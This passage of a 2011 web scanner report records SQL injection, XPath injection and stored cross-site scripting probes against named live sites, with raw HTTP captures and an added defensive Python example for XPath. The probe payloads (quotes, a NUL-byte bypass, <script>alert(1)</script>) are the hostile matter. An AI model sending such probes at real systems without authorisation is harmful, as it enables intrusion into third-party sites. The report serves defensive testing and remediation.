%3Dv55&v55=PCR%3AHome%3Ahomepage%3A8-29_clear-new-rowc&c59=D%3Dv59&v59=pcr_hallowee_8-29-11&c60=D%3Dv60&v60=PCR%3AHome%3Aother%3Apcr_halloween_nav&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&AQE=1 HTTP/1.1
Host: wa.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731657085158532-6000017500001E87[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:20:50 GMT
Server: Omniture DC/2.0.0
xserver: www650
Content-Length: 0
Content-Type: text/html


1.3. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s84476320391986 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wa.proflowers.com
Path:   /b/ss/proflodevelopment/1/H.22.1/s84476320391986

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Both responses are again HTTP 404s from the Omniture DC server, not database errors, so the finding is unconfirmed.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked. Response 1 again reports the requested URL as /b/ss (truncated at the NUL byte), so as in 1.2 the evidence shows server-side NUL truncation, not a bypassed filter.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss%00'/proflodevelopment/1/H.22.1/s84476320391986?AQB=1&ndh=1&t=3%2F8%2F2011%2019%3A49%3A15%206%20300&ns=proflowers1&pageName=PCR%3AHome%3Ahome&g=http%3A%2F%2Fwww.personalcreations.com%2F%3Fref%3Dpcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme%26Keyword%3DPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html%26Network%3DCasale_Media&r=http%3A%2F%2Fimg-cdn.mediaplex.com%2F0%2F10105%2FPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf&cc=USD&ch=PCR%3AHome&server=PRVD23&v0=pcrprtlscasalemedia_roncpcanniversary_hp_720x300anniv_hrtsndprntpwtrpltthennowfrme&c1=PCR%3AHome%3Aphmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v1=D%3Ds.campaign&c2=5%3A30PM&v2=D%3Ds.campaign&c3=Saturday&v3=D%3Ds.campaign&v4=PCR&c5=na%3Ana%3Ana%3Ana&v5=phmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v7=34&c11=PCR&c12=true&v12=%3A%3Atks2%3Atkt2%3A%3Atmm1%3A%3Atpp3%3Atrm1%3Attb4%3Atpf1%3A%3Atbc1%3Athp1%3A%3A%3A%3Axta1%3A&c13=false&c14=true&v22=5%3A30PM&v23=Saturday&c28=81ea4087-d623-410d-aa84-36102d92184b&v31=-1&c35=CUS&v35=empty%20code&c37=v.1.0.5&v39=tms1%3Atvc2%3A%3A%3A%3A%3Atxb2%3Atxc2%3A%3A%3A%3A%3A%3Atnp1%3A%3A%3A%3Axtc1%3A&v49=%3A%3A%3A%3A%3A%3Atrf2%3A%3A%3Anta2%3Antb2%3Antc2%3Antd1%3Ante1%3A%3A%3A%3Axtb1%3A&v50=PCR%3AUSA&v51=D%3Dv5&v52=PCR&c53=D%3Dv53&v53=homepage003&c54=D%3Dv54&v54=pcr_8-29-11-bir-rowc&c55=D%3Dv55&v55=PCR%3AHome%3Ahomepage%3A8-29_clear-bir-rowc&c59=D%3Dv59&v59=pcr_hallowee_8-29-11&c60=D%3Dv60&v60=PCR%3AHome%3Aother%3Apcr_halloween_nav&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&AQE=1 HTTP/1.1
Host: wa.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731657085158532-6000017500001E87[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:15 GMT
Server: Omniture DC/2.0.0
Content-Length: 399
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/proflodevelopment/1/H.22.1/s84476320391986?AQB=1&ndh=1&t=3%2F8%2F2011%2019%3A49%3A15%206%20300&ns=proflowers1&pageName=PCR%3AHome%3Ahome&g=http%3A%2F%2Fwww.personalcreations.com%2F%3Fref%3Dpcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme%26Keyword%3DPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html%26Network%3DCasale_Media&r=http%3A%2F%2Fimg-cdn.mediaplex.com%2F0%2F10105%2FPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf&cc=USD&ch=PCR%3AHome&server=PRVD23&v0=pcrprtlscasalemedia_roncpcanniversary_hp_720x300anniv_hrtsndprntpwtrpltthennowfrme&c1=PCR%3AHome%3Aphmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v1=D%3Ds.campaign&c2=5%3A30PM&v2=D%3Ds.campaign&c3=Saturday&v3=D%3Ds.campaign&v4=PCR&c5=na%3Ana%3Ana%3Ana&v5=phmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v7=34&c11=PCR&c12=true&v12=%3A%3Atks2%3Atkt2%3A%3Atmm1%3A%3Atpp3%3Atrm1%3Attb4%3Atpf1%3A%3Atbc1%3Athp1%3A%3A%3A%3Axta1%3A&c13=false&c14=true&v22=5%3A30PM&v23=Saturday&c28=81ea4087-d623-410d-aa84-36102d92184b&v31=-1&c35=CUS&v35=empty%20code&c37=v.1.0.5&v39=tms1%3Atvc2%3A%3A%3A%3A%3Atxb2%3Atxc2%3A%3A%3A%3A%3A%3Atnp1%3A%3A%3A%3Axtc1%3A&v49=%3A%3A%3A%3A%3A%3Atrf2%3A%3A%3Anta2%3Antb2%3Antc2%3Antd1%3Ante1%3A%3A%3A%3Axtb1%3A&v50=PCR%3AUSA&v51=D%3Dv5&v52=PCR&c53=D%3Dv53&v53=homepage003&c54=D%3Dv54&v54=pcr_8-29-11-bir-rowc&c55=D%3Dv55&v55=PCR%3AHome%3Ahomepage%3A8-29_clear-bir-rowc&c59=D%3Dv59&v59=pcr_hallowee_8-29-11&c60=D%3Dv60&v60=PCR%3AHome%3Aother%3Apcr_halloween_nav&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&AQE=1 HTTP/1.1
Host: wa.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731657085158532-6000017500001E87[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:15 GMT
Server: Omniture DC/2.0.0
xserver: www616
Content-Length: 0
Content-Type: text/html


1.4. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s85063178692944 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wa.proflowers.com
Path:   /b/ss/proflodevelopment/1/H.22.1/s85063178692944

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Here the quotes were sent unencoded; Response 1 echoes /b'/ss/... inside a 404 error body and Response 2 is an empty 404, so, as in 1.1, the finding rests on two Not Found responses from the Omniture DC server rather than on a database error.

Request 1

GET /b'/ss/proflodevelopment/1/H.22.1/s85063178692944?AQB=1&pccr=true&vidn=2731657085158532-6000017500001E87&&ndh=1&t=3%2F8%2F2011%2019%3A49%3A11%206%20300&ns=proflowers1&pageName=PCR%3AHome%3Ahome&g=http%3A%2F%2Fwww.personalcreations.com%2F%3Fref%3Dpcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme%26Keyword%3DPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html%26Network%3DCasale_Media&r=http%3A%2F%2Fimg-cdn.mediaplex.com%2F0%2F10105%2FPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf&cc=USD&ch=PCR%3AHome&server=PRVD25&v0=pcrprtlscasalemedia_roncpcanniversary_hp_720x300anniv_hrtsndprntpwtrpltthennowfrme&c1=PCR%3AHome%3Aphmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v1=D%3Ds.campaign&c2=5%3A30PM&v2=D%3Ds.campaign&c3=Saturday&v3=D%3Ds.campaign&v4=PCR&c5=na%3Ana%3Ana%3Ana&v5=phmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v7=6&c11=PCR&c12=true&v12=%3A%3Atks3%3Atkt1%3A%3Atmm2%3A%3Atpp3%3Atrm1%3Attb4%3Atpf1%3A%3Atbc3%3Athp1%3A%3A%3A%3Axta1%3A&c13=false&c14=true&v22=5%3A30PM&v23=Saturday&c28=2c8b00cf-c75e-4f55-839f-5b4055db896f&v31=-1&c35=CUS&v35=empty%20code&c37=v.1.0.5&v39=tms1%3Atvc2%3A%3A%3A%3A%3Atxb1%3Atxc2%3A%3A%3A%3A%3A%3Atnp1%3A%3A%3A%3Axtc1%3A&v49=%3A%3A%3A%3A%3A%3Atrf1%3A%3A%3Anta2%3Antb2%3Antc1%3Antd1%3Ante1%3A%3A%3A%3Axtb1%3A&v50=PCR%3AUSA&v51=D%3Dv5&v52=PCR&c53=D%3Dv53&v53=homepage003&c54=D%3Dv54&v54=pcr_8-29-11-bir-rowc&c55=D%3Dv55&v55=PCR%3AHome%3Ahomepage%3A8-29_clear-bir-rowc&c59=D%3Dv59&v59=pcr_hallowee_8-29-11&c60=D%3Dv60&v60=PCR%3AHome%3Aother%3Apcr_halloween_nav&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&AQE=1 HTTP/1.1
Host: wa.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731657085158532-6000017500001E87[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:17:43 GMT
Server: Omniture DC/2.0.0
Content-Length: 443
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b'/ss/proflodevelopment/1/H.22.1/s85063178692944 was
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b''/ss/proflodevelopment/1/H.22.1/s85063178692944?AQB=1&pccr=true&vidn=2731657085158532-6000017500001E87&&ndh=1&t=3%2F8%2F2011%2019%3A49%3A11%206%20300&ns=proflowers1&pageName=PCR%3AHome%3Ahome&g=http%3A%2F%2Fwww.personalcreations.com%2F%3Fref%3Dpcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme%26Keyword%3DPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html%26Network%3DCasale_Media&r=http%3A%2F%2Fimg-cdn.mediaplex.com%2F0%2F10105%2FPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf&cc=USD&ch=PCR%3AHome&server=PRVD25&v0=pcrprtlscasalemedia_roncpcanniversary_hp_720x300anniv_hrtsndprntpwtrpltthennowfrme&c1=PCR%3AHome%3Aphmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v1=D%3Ds.campaign&c2=5%3A30PM&v2=D%3Ds.campaign&c3=Saturday&v3=D%3Ds.campaign&v4=PCR&c5=na%3Ana%3Ana%3Ana&v5=phmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v7=6&c11=PCR&c12=true&v12=%3A%3Atks3%3Atkt1%3A%3Atmm2%3A%3Atpp3%3Atrm1%3Attb4%3Atpf1%3A%3Atbc3%3Athp1%3A%3A%3A%3Axta1%3A&c13=false&c14=true&v22=5%3A30PM&v23=Saturday&c28=2c8b00cf-c75e-4f55-839f-5b4055db896f&v31=-1&c35=CUS&v35=empty%20code&c37=v.1.0.5&v39=tms1%3Atvc2%3A%3A%3A%3A%3Atxb1%3Atxc2%3A%3A%3A%3A%3A%3Atnp1%3A%3A%3A%3Axtc1%3A&v49=%3A%3A%3A%3A%3A%3Atrf1%3A%3A%3Anta2%3Antb2%3Antc1%3Antd1%3Ante1%3A%3A%3A%3Axtb1%3A&v50=PCR%3AUSA&v51=D%3Dv5&v52=PCR&c53=D%3Dv53&v53=homepage003&c54=D%3Dv54&v54=pcr_8-29-11-bir-rowc&c55=D%3Dv55&v55=PCR%3AHome%3Ahomepage%3A8-29_clear-bir-rowc&c59=D%3Dv59&v59=pcr_hallowee_8-29-11&c60=D%3Dv60&v60=PCR%3AHome%3Aother%3Apcr_halloween_nav&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&AQE=1 HTTP/1.1
Host: wa.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731657085158532-6000017500001E87[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:17:43 GMT
Server: Omniture DC/2.0.0
xserver: www619
Content-Length: 0
Content-Type: text/html


2. XPath injection
There are 2 instances of this issue:

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases it will be appropriate to accept only short alphanumeric strings, which is all a REST path segment such as those in 2.1 and 2.2 should ever contain. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected. Where the XPath API supports variables (a custom XsltContext exposing IXsltContextVariable in .NET, XPathVariableResolver in Java), pass user data as a bound variable instead of concatenating it into the expression; where it does not, build each value as a string literal with concat() so that a quote in the data can never terminate the literal. Verbose XPath errors such as the stack traces below should also be suppressed in production responses, since they both confirm the injection point and reveal the parser in use.
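An added example, in Python, that is not part of the scanner's report and not the code of the application in 2.1 and 2.2: the concatenation defect the stack trace points to, beside the two defences described above. The query shape, the element names and the lookup() handler are assumptions made for this example; only the ' payload and the campusrivalry and topics path segments come from the findings. It also generalises the remediation slightly: when the XPath API offers no variable binding, any string, quotes included, can still be passed safely by rendering it as a concat() literal.

```python
import re

# Constructed query shape: the page only shows the .NET stack trace, not the
# application's real expression, so a plausible two-segment lookup is assumed.
def build_query_unsafe(community: str, section: str) -> str:
    """Vulnerable: REST path segments are spliced straight into the expression.
    A lone quote produces the 'unclosed string' error seen in 2.1/2.2; a quote
    followed by XPath syntax rewrites the predicate instead of breaking it."""
    return f"//community[@name='{community}']/section[@name='{section}']"


def xpath_literal(value: str) -> str:
    """Render any string as an XPath 1.0 string literal.

    XPath 1.0 string literals have no escape mechanism, so a value containing
    the delimiter cannot be written as one literal. The usual workaround is
    concat(): split on the single quote, emit each piece as a single-quoted
    literal and each quote as the double-quoted literal "'". Whatever the
    input, the engine sees one string value and never any new syntax.
    """
    if "'" not in value:
        return f"'{value}'"
    if '"' not in value:
        return f'"{value}"'
    pieces = []
    parts = value.split("'")
    for i, part in enumerate(parts):
        if part:
            pieces.append(f"'{part}'")
        if i < len(parts) - 1:
            pieces.append("\"'\"")
    return "concat(" + ", ".join(pieces) + ")"


def build_query_safe(community: str, section: str) -> str:
    """Hardened: every user-controlled value is wrapped by xpath_literal()."""
    return (f"//community[@name={xpath_literal(community)}]"
            f"/section[@name={xpath_literal(section)}]")


# Allow-list validation for REST path segments, as the remediation recommends:
# short identifiers only. The metacharacter set from the remediation text is
# checked as well; redundant given the pattern, but it keeps the policy
# explicit if the pattern is ever loosened.
_SEGMENT_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")
_XPATH_METACHARS = set("\"'/@=*[]()")


def is_valid_segment(value: str) -> bool:
    return bool(_SEGMENT_RE.match(value)) and not (_XPATH_METACHARS & set(value))


def lookup(community: str, section: str) -> str:
    """Handler shape (assumed): validate first, then build the expression from
    literals. Either layer alone blocks the report's payload; both are kept."""
    if not (is_valid_segment(community) and is_valid_segment(section)):
        raise ValueError("path segment rejected")
    return build_query_safe(community, section)
```

With the report's input the unsafe builder yields `//community[@name='campusrivalry'']/...`, which is exactly the unclosed-string condition the .NET parser reported; the safe builder yields `@name="campusrivalry'"`, a single literal, and the validator never lets the request get that far.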


2.1. http://content.usatoday.com/communities/campusrivalry/topics [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://content.usatoday.com
Path:   /communities/campusrivalry/topics

Issue detail

The REST URL parameter 2 (the campusrivalry path segment) appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and the application answered 200 OK with a System.Xml.XPath stack trace ("This is an unclosed string", raised in XPathScanner.ScanString and reached through XPathExpression.Compile). The single quote therefore arrived at the XPath compiler unescaped, which is strong evidence that the path segment is concatenated into an expression; review the error message and the application's handling of other input to confirm whether the query can be altered rather than merely broken. The stack trace is also a verbose-error disclosure in its own right.

The application appears to be using the ASP.NET XPath APIs (System.Xml.XPath, per the stack trace and the X-AspNet-Version header).

Request

GET /communities/campusrivalry'/topics HTTP/1.1
Host: content.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowserSniffer=navigator.type%3D4%3B%0Anavigator.version%3D535.1%3B%0Anavigator.os%3D%22undefined%22%3B%0Anavigator.jsVersion%3D1.6%3B%0Anavigator.vbScriptEnabled%3Dfalse%3B%0A; s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; ASPSESSIONIDASQTAAAC=EPNJMMPAKJOIAFKDGAKKCMKG; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; s_ppv=11; __qca=P0-1950655009-1315096993908; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=usatodayprod%2Cgntbcstglobal%3D%2526pid%253Dusat%252520%25253A%25252Fcommunities%25252Fcampusrivalry%25252Fpost%25252F2011%25252F09%25252Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%25252F1%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcontent.usatoday.com%25252Fcommunities%25252Fcampusrivalry%25252Ftopics_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:48:36 GMT
Content-Length: 2862

<b>This is an unclosed string.</b><br/> at MS.Internal.Xml.XPath.XPathScanner.ScanString()<br/> at MS.Internal.Xml.XPath.XPathScanner.NextLex()<br/> at MS.Internal.Xml.XPath.XPathParser.ParsePri
...[SNIP]...
<br/> at System.Xml.XPath.XPathExpression.Compile(String xpath, IXmlNamespaceResolver nsResolver)<br/>
...[SNIP]...

2.2. http://content.usatoday.com/communities/campusrivalry/topics [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://content.usatoday.com
Path:   /communities/campusrivalry/topics

Issue detail

The REST URL parameter 3 (the topics path segment) appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and the application answered 200 OK with the same System.Xml.XPath "unclosed string" stack trace as in 2.1. Since a quote in either segment produces an identical error, both segments are most likely placed into one expression and this is probably a single sink reported twice; confirm by reviewing the error message and the application's handling of other input.

The application appears to be using the ASP.NET XPath APIs (System.Xml.XPath, per the stack trace and the X-AspNet-Version header).

Request

GET /communities/campusrivalry/topics' HTTP/1.1
Host: content.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowserSniffer=navigator.type%3D4%3B%0Anavigator.version%3D535.1%3B%0Anavigator.os%3D%22undefined%22%3B%0Anavigator.jsVersion%3D1.6%3B%0Anavigator.vbScriptEnabled%3Dfalse%3B%0A; s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; ASPSESSIONIDASQTAAAC=EPNJMMPAKJOIAFKDGAKKCMKG; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; s_ppv=11; __qca=P0-1950655009-1315096993908; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=usatodayprod%2Cgntbcstglobal%3D%2526pid%253Dusat%252520%25253A%25252Fcommunities%25252Fcampusrivalry%25252Fpost%25252F2011%25252F09%25252Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%25252F1%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcontent.usatoday.com%25252Fcommunities%25252Fcampusrivalry%25252Ftopics_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:48:37 GMT
Content-Length: 2862

<b>This is an unclosed string.</b><br/> at MS.Internal.Xml.XPath.XPathScanner.ScanString()<br/> at MS.Internal.Xml.XPath.XPathScanner.NextLex()<br/> at MS.Internal.Xml.XPath.XPathParser.ParsePri
...[SNIP]...
<br/> at System.Xml.XPath.XPathExpression.Compile(String xpath, IXmlNamespaceResolver nsResolver)<br/>
...[SNIP]...

3. Cross-site scripting (stored)
There are 2 instances of this issue:

Issue background

Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences. First, input should be validated as strictly as possible on arrival, given the kind of content it is expected to contain: an identifier such as a beacon id or a session token should be short and alphanumeric, and input that fails validation should be rejected rather than sanitised. Second, user input should be encoded for the context into which it is copied, at every point where it enters a response: HTML metacharacters (< > " ' and =) replaced by the corresponding entities in HTML text and attributes, and JavaScript string escaping applied where the value lands inside a script literal, as in 3.1 and 3.2 below. In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://rma-api.gravity.com/v1/beacons/initialize [vaguid cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://rma-api.gravity.com
Path:   /v1/beacons/initialize

Issue detail

The value of the vaguid cookie submitted to the URL /v1/beacons/initialize is copied, unencoded, into the response body. The payload 4a902<script>alert(1)</script>1bb5b69e467 was submitted in the vaguid cookie; the server retained it (Response 2 re-issues the tainted value in a Set-Cookie for .gravity.com with a 2063 expiry) and returned it unmodified in a subsequent request for the same URL that carried only the original cookie value.

Two caveats apply before treating this as confirmed script execution. The reflection point is a single-quoted JavaScript string literal in a text/javascript response (GravityInsights.cc('grvinsights', '...')), not HTML text between tags as the scanner's template states: a <script> tag inside a JavaScript string is inert when the file is loaded through a script src, and the payload contains no ' to close the literal, so this capture shows unencoded reflection into a script context rather than a working injection. And because the tainted value arrives in a cookie, an attacker must first be able to set vaguid for the victim's browser on .gravity.com (from another gravity.com host, or from a network position on plain HTTP) for anyone other than the attacker to be affected. Neither point is tested in this report.

Request 1

GET /v1/beacons/initialize?u=undefined&sg=6e1ea1b081dc6743bbe3537728eca43d HTTP/1.1
Host: rma-api.gravity.com
Proxy-Connection: keep-alive
